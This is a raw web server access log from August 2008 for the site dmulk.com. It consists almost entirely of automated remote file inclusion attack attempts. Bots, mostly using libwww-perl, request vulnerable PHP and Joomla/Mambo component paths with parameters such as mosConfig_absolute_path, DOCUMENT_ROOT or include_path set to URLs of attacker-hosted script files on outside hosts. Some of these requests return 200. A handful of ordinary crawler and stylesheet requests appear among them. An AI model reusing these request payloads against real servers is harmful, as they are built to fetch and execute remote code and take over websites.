69.19.225.130 - - [21/Aug/2008:11:25:52 -0700] "GET /logs/access_080405.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.195.37.176 - - [21/Aug/2008:11:25:57 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:26:02 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:26:02 -0700] "GET //index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:26:02 -0700] "GET /logs/access_080802.log//index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:26:02 -0700] "GET /logs/access_080804.log//index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:26:02 -0700] "GET /logs/access_080802.log//index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:26:03 -0700] "GET //index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:26:03 -0700] "GET /logs/access_080804.log//index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:26:03 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:13 -0700] "GET /logs/access_080307.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:13 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9942 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:15 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:17 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9895 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:19 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:21 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:21 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:22 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:26 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.195.37.176 - - [21/Aug/2008:11:26:27 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:31 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.176 - - [21/Aug/2008:11:26:31 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
208.38.189.90 - - [21/Aug/2008:11:26:33 -0700] "GET /logs/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.189.90 - - [21/Aug/2008:11:26:33 -0700] "GET /components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:34 -0700] "GET /errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:34 -0700] "GET /logs/errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:26:36 -0700] "GET //index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:26:41 -0700] "GET /logs/access_080802.log//index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:26:41 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [21/Aug/2008:11:26:44 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [21/Aug/2008:11:26:44 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:55 -0700] "GET /logs/access_080414.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:56 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:26:59 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:27:12 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "libwww-perl/5.808" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:27:15 -0700] "GET /logs/access_080804.log//index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:27:17 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:27:18 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:27:22 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:27:23 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.248.62.98 - - [21/Aug/2008:11:27:24 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.248.62.98 - - [21/Aug/2008:11:27:24 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
59.126.46.141 - - [21/Aug/2008:11:27:37 -0700] "GET /logs/access_080806.log/lostpasswd.php?env[include_prefix]=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:27:40 -0700] "GET /logs/access_080311.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:27:41 -0700] "GET /logs/access_080311.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:27:42 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:27:42 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 200 9938 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:27:42 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 200 9938 "-" "libwww-perl/5.803" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:27:42 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:27:42 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:27:42 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:27:42 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:27:43 -0700] "GET /logs/access_080730.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.77.242 - - [21/Aug/2008:11:27:43 -0700] "GET /logs/access_080730.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:27:44 -0700] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:27:47 -0700] "GET /logs/access_080810.log//?include_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:27:48 -0700] "GET /logs//?include_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 61575 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:27:48 -0700] "GET //?include_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9888 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:27:49 -0700] "GET /logs/access_080803.log/errors.php?error=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:27:49 -0700] "GET /errors.php?error=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:27:49 -0700] "GET /logs/errors.php?error=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:27:53 -0700] "GET /logs/access_080802.log//index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:27:53 -0700] "GET //index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:27:53 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:27:53 -0700] "GET /logs/access_080804.log//index/login.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:27:53 -0700] "GET //SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:27:53 -0700] "GET /logs/access_080703.log//?include_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:27:53 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:27:54 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9944 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:27:56 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:28:23 -0700] "GET /logs/access_080720.log//index/login.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:28:26 -0700] "GET //SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:28:26 -0700] "GET /logs//s_e404.inc.php?DOCUMENT_ROOT=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:28:27 -0700] "GET //s_e404.inc.php?DOCUMENT_ROOT=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:28:30 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:28:33 -0700] "GET /logs/access_080718.log/errors.php?error=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:28:33 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.97 - - [21/Aug/2008:11:28:34 -0700] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:28:37 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9942 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:28:43 -0700] "GET /logs/access_080727.log/errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:28:43 -0700] "GET /errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:28:43 -0700] "GET /logs/errors.php?error=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.97 - - [21/Aug/2008:11:28:46 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:28:49 -0700] "GET /logs/access_080802.log//index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:28:49 -0700] "GET //index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:28:49 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:28:49 -0700] "GET /logs/access_080804.log//index/login.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:28:52 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:28:54 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:28:54 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:28:54 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:28:59 -0700] "GET /logs/access_080404.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:11:29:00 -0700] "GET /logs/access_080806.log//index/login.php?DOCUMENT_ROOT=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:11:29:00 -0700] "GET //index/login.php?DOCUMENT_ROOT=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:11:29:00 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:29:13 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:29:13 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.67.135 - - [21/Aug/2008:11:29:14 -0700] "GET /blog/wp-content/gallery/techstoc-2008/thumbs/thumbs_img_1008.jpg HTTP/1.1" 200 9880 "-" "Googlebot-Image/1.0" "dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:29:15 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:29:18 -0700] "GET /logs/access_080725.log/errors.php?error=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:29:20 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:29:21 -0700] "GET /administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:29:21 -0700] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:29:28 -0700] "GET /logs/access_080703.log//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:29:29 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:29:29 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.211.131.132 - - [21/Aug/2008:11:29:49 -0700] "GET /logs/access_080809.log/layout/default/params.php?gConf[dir][layouts]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:29:55 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.97 - - [21/Aug/2008:11:29:55 -0700] "GET /administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:29:56 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:29:56 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:29:59 -0700] "GET /logs/access_080321.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
